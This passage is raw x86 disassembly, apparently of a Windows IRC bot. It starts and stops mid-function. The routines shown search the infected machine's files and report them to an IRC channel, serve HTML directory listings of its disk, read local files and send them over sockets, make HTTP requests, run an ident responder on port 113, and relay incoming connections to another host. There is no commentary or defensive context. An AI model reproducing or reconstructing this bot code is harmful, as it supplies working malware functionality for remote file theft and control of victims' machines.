push offset asc_434C0C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415D38
add esp, 10h
loc_410364: ; CODE XREF: sub_4100B4+1B4�j
; sub_4100B4+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4100B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41036B(char *Str,int,int,char *Source)
sub_41036B proc near ; CODE XREF: sub_401ACD+75E3�p
; sub_40FF31+15A�p
Dst = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
Str1 = byte ptr -35Ch
var_248 = byte ptr -248h
Dest = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call _memset
mov edi, [ebp+Str]
push offset asc_42A080 ; "\n"
push edi ; Str
call _strtok
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_4103CA
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_4104C9
; ---------------------------------------------------------------------------
loc_4103CA: ; CODE XREF: sub_41036B+3A�j
cmp [ebp+Source], ebx
push edi ; Str
jz loc_4104AF
call _strlen
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push edi ; Str
call _strlen
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_4104C9
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_41036B+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_4104C9: ; CODE XREF: sub_41036B+5A�j
; sub_41036B+142�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp [ebp+Source], ebx
jz short loc_410564
push [ebp+Source] ; Str
call _strlen
cmp eax, 2
pop ecx
jbe short loc_410564
push [ebp+Source] ; Str
call _strlen
sub eax, 3
pop ecx
jz short loc_410515
loc_410509: ; CODE XREF: sub_41036B+1A8�j
mov ecx, [ebp+Source]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_410515
dec eax
jnz short loc_410509
loc_410515: ; CODE XREF: sub_41036B+19C�j
; sub_41036B+1A5�j
inc eax
push eax ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
loc_410564: ; CODE XREF: sub_41036B+180�j
; sub_41036B+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_427124 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+Str], eax
push ecx
push eax
call ds:dword_427120 ; FindNextFileA
test eax, eax
jz loc_410954
mov edi, 1FFh
loc_410590: ; CODE XREF: sub_41036B+5E3�j
cmp [ebp+var_388], ebx
jz loc_41093C
lea eax, [ebp+Str1]
push offset a__ ; ".."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_41093C
lea eax, [ebp+Str1]
push offset a__0 ; "."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_41093C
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_42711C ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_427118 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm_0 ; "PM"
cmp ax, 0Ch
ja short loc_410605
mov ecx, offset aAm ; "AM"
loc_410605: ; CODE XREF: sub_41036B+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_410611
sub eax, 0Ch
loc_410611: ; CODE XREF: sub_41036B+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+Dest]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax ; Dest
call _sprintf
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4107B4
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_410685
lea eax, [ebp+Str1]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_4108FD
; ---------------------------------------------------------------------------
loc_410685: ; CODE XREF: sub_41036B+2E0�j
cmp [ebp+Source], ebx
jz loc_41076F
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_4 ; "%s%s/"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Eh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_410725
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_41072A
; ---------------------------------------------------------------------------
loc_410725: ; CODE XREF: sub_41036B+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_41072A: ; CODE XREF: sub_41036B+3B8�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4108FE
; ---------------------------------------------------------------------------
loc_41076F: ; CODE XREF: sub_41036B+31D�j
lea eax, [ebp+Str1]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_41090D
; ---------------------------------------------------------------------------
loc_4107B4: ; CODE XREF: sub_41036B+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4107F3
push ebx
push [ebp+var_368]
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi ; Count
loc_4107DF: ; CODE XREF: sub_41036B+577�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 1Ch
jmp loc_41090D
; ---------------------------------------------------------------------------
loc_4107F3: ; CODE XREF: sub_41036B+44F�j
cmp [ebp+Source], ebx
jz loc_4108E7
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS ; "%s%s"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Fh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_410893
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_410898
; ---------------------------------------------------------------------------
loc_410893: ; CODE XREF: sub_41036B+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_410898: ; CODE XREF: sub_41036B+526�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4107DF
; ---------------------------------------------------------------------------
loc_4108E7: ; CODE XREF: sub_41036B+48B�j
push [ebp+var_368]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_4108FD: ; CODE XREF: sub_41036B+315�j
push esi ; Count
loc_4108FE: ; CODE XREF: sub_41036B+3FF�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 18h
loc_41090D: ; CODE XREF: sub_41036B+444�j
; sub_41036B+483�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp [ebp+arg_8], ebx
jz short loc_41093C
push 7D0h
call ds:dword_427080 ; Sleep
loc_41093C: ; CODE XREF: sub_41036B+22B�j
; sub_41036B+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+Str]
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz loc_410590
loc_410954: ; CODE XREF: sub_41036B+21A�j
push [ebp+Str]
call ds:dword_427000 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_410997
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_4109CB
; ---------------------------------------------------------------------------
loc_410997: ; CODE XREF: sub_41036B+5F5�j
cmp [ebp+Source], ebx
jz short loc_4109B1
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_4109CB
; ---------------------------------------------------------------------------
loc_4109B1: ; CODE XREF: sub_41036B+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax ; Dest
call _sprintf
add esp, 10h
loc_4109CB: ; CODE XREF: sub_41036B+62A�j
; sub_41036B+644�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_41036B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109F1 proc near ; CODE XREF: sub_40FF31+13C�p
Dst = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_4270F8 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410AA9
push esi
push ebx
call ds:dword_427114 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_410AA2
loc_410A36: ; CODE XREF: sub_4109F1+AF�j
push 400h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_410A53
mov edi, [ebp+arg_4]
loc_410A53: ; CODE XREF: sub_4109F1+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_427128 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Dst]
push edi
push eax
push ebx
call ds:dword_4270EC ; ReadFile
push esi
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_410A9D
call dword_4CB968 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_410AA2
xor eax, eax
loc_410A9D: ; CODE XREF: sub_4109F1+9B�j
sub [ebp+arg_4], eax
jnz short loc_410A36
loc_410AA2: ; CODE XREF: sub_4109F1+43�j
; sub_4109F1+A8�j
push ebx
call ds:dword_427070 ; CloseHandle
loc_410AA9: ; CODE XREF: sub_4109F1+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_4109F1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_410AAE(char *Str)
sub_410AAE proc near ; CODE XREF: sub_4100B4+181�p
Str = dword ptr 4
push esi
push edi
mov edi, [esp+8+Str]
xor esi, esi
push edi ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_410AD7
loc_410AC1: ; CODE XREF: sub_410AAE+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_410ACB
mov byte ptr [esi+edi], 2Fh
loc_410ACB: ; CODE XREF: sub_410AAE+17�j
push edi ; Str
inc esi
call _strlen
cmp esi, eax
pop ecx
jb short loc_410AC1
loc_410AD7: ; CODE XREF: sub_410AAE+11�j
mov eax, edi
pop edi
pop esi
retn
sub_410AAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410ADC(int,char *Str,int,int,int,int,int,int,int)
sub_410ADC proc near ; CODE XREF: sub_401ACD+51B7�p
var_4A0 = byte ptr -4A0h
Dest = byte ptr -310h
Format = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_4CB944 ; WSAStartup
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_14]
call dword_4CB9D4 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40A8F0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_410BB9
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410B55
mov eax, offset byte_43DB88
loc_410B55: ; CODE XREF: sub_410ADC+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+Format]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Format]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Format]
push eax
push ebx
call dword_4CBA24 ; send
push esi ; Size
lea eax, [ebp+Format]
push edi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+Format]
push edi
push esi
push eax
push ebx
call dword_4CB9EC ; recv
pop esi
loc_410BB9: ; CODE XREF: sub_410ADC+6B�j
push ebx
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_410BF9
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_410BF9: ; CODE XREF: sub_410ADC+102�j
pop edi
pop ebx
leave
retn
sub_410ADC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BFD proc near ; DATA XREF: WinMain(x,x,x,x)+445�o
; sub_401ACD+438B�o
Str = byte ptr -238h
Dest = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_8], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 71h
call dword_4CB9D4 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410D61
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_43E91C[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jz loc_410D61
push 5
push ebx
call dword_4CB9FC ; listen
cmp eax, 0FFFFFFFFh
jz loc_410D61
mov [ebp+var_C], edi
mov edi, 200h
loc_410C88: ; CODE XREF: sub_410BFD+EA�j
; sub_410BFD+14D�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_410D5C
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Str]
push offset asc_435164 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415D38
add esp, 14h
lea eax, [ebp+Str]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410C88
lea eax, [ebp+Str]
push esi ; int
push eax ; Str
call sub_4184CC
push 0Ch ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push esi ; Str1
push esi ; int
lea eax, [ebp+Dest]
push 2 ; int
push eax ; Dest
call sub_40AE84
add esp, 24h
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_410C88
mov [ebp+var_8], 1
jmp loc_410C88
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410BFD+A0�j
cmp [ebp+var_8], esi
jnz short loc_410D88
loc_410D61: ; CODE XREF: sub_410BFD+47�j
; sub_410BFD+6B�j ...
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Str]
push offset asc_435120 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_415D38
add esp, 10h
loc_410D88: ; CODE XREF: sub_410BFD+162�j
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410BFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410DAB proc near ; DATA XREF: sub_401ACD+605D�o
Source = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_44]
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410F17
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov dword_43E91C[ecx], eax
call dword_4CB8E4 ; WSAAsyncSelect
lea eax, [ebp+Dst]
push edi
push eax
push [ebp+arg_0]
call dword_4CBA00 ; bind
test eax, eax
jnz loc_410F17
push 0Ah
push [ebp+arg_0]
call dword_4CB9FC ; listen
test eax, eax
jnz loc_410F17
loc_410E5B: ; CODE XREF: sub_410DAB+C6�j
; sub_410DAB+147�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call dword_4CBA68 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410E5B
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_4351CC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B3BA
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_410F3C
push esi
push esi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_410F02
loc_410EEF: ; CODE XREF: sub_410DAB+155�j
cmp [ebp+var_30], esi
jnz loc_410E5B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_410EEF
; ---------------------------------------------------------------------------
loc_410F02: ; CODE XREF: sub_410DAB+142�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435190 ; "-"
call sub_415DAC
pop ecx
pop ecx
jmp short loc_410F1A
; ---------------------------------------------------------------------------
loc_410F17: ; CODE XREF: sub_410DAB+63�j
; sub_410DAB+97�j ...
mov edi, [ebp+arg_0]
loc_410F1A: ; CODE XREF: sub_410DAB+16A�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_40]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_410DAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F3C proc near ; DATA XREF: sub_410DAB+124�o
var_1344 = byte ptr -1344h
Source = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
Dst = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_4CBA54 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_4110F2
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4CB9D4 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_410FCC
lea eax, [ebp+var_13C]
push eax
call dword_4CBA58 ; gethostbyname
jmp short loc_410FDA
; ---------------------------------------------------------------------------
loc_410FCC: ; CODE XREF: sub_410F3C+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
loc_410FDA: ; CODE XREF: sub_410F3C+8E�j
cmp eax, edi
jz loc_4110F2
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+Dst]
push eax
push esi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4110F2
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_435254 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Source]
push 18h ; int
push eax ; Source
call sub_40B3BA
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_43E91C[ebx]
mov dword_43E914[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_43E920[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
